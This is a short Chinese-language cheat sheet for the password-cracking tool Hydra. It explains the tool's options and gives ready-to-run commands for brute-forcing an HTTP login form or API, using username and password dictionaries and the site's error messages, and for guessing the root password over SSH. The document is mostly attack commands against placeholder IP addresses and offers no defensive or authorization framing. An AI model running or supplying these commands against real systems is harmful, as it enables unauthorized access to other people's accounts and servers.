hydra爆破使用手册

hydra参数介绍

-l  指定破解的用户，对特定用户破解
-L  指定用户名字典
-p  小写，指定密码破解，少用，一般是采用密码字典
-P  大写，指定密码字典
-R  继续从上一次进度接着破解
-S  大写，采用SSL链接
-s  小写，可通过这个参数指定非默认端口
-e  可选选项，n：空密码试探，s：使用指定用户和密码试探
-t  同时运行的线程数，默认为16
-C  使用冒号分割格式，例如“登录名:密码”来代替 -L/-P 参数
-M  指定目标列表文件一行一条
-o  指定结果输出文件
-f  在使用-M参数以后，找到第一对登录名或者密码的时候中止破解
-w  设置最大超时的时间，单位秒，默认是30s
-v/-V   显示详细过程
server  目标ip
service 指定服务名，支持的服务和协议

hydra爆破场景

hydra爆破API接口或表单

hydra -L ./常用用户名.txt -p 111111 -o ok.lst -t 5 -V -f 1.1.1.1 http-post-form "/login:teaId=^USER^&teaPwd=^PASS^&requestType=json:用户不存在"

hydra -l 20060138  -P ./渗透字典.txt  -o ok.lst -t 5 -V -f 2.2.2.2 http-post-form "/login:teaId=^USER^&teaPwd=^PASS^&requestType=json:密码不正确"

hydra爆破ssh服务

hydra -l root -P ./常用密码.txt -t 4 ssh://3.3.3.3